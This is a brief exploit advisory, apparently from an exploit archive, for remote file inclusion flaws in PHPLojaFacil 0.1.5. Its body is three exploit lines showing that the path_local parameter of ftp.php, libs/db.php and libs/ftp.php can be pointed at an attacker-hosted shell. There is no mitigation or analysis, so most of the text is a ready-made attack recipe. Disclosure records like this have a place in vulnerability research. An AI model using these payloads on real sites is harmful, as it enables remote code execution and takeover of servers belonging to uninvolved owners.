id: 1848
date: 05/07/2007
title: PHPLojaFacil 0.1.5 (path_local) Remote File Inclusion Vulnerabilities
author: GoLd_M
cves: 

=====================================================================
PHPLojaFacil 0.1.5 (path_local) Remote File Inclusion Vulnerabilities
=====================================================================



# PHPLojaFacil 0.1.5 (path_local) Remote File Inclusion Vulnerabilities
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/ftp.php?path_local=Shell
# Exploit:[Path]/libs/db.php?path_local=Shell
# Exploit:[Path]/libs/ftp.php?path_local=Shell



#  0day.today [2023-03-26]  #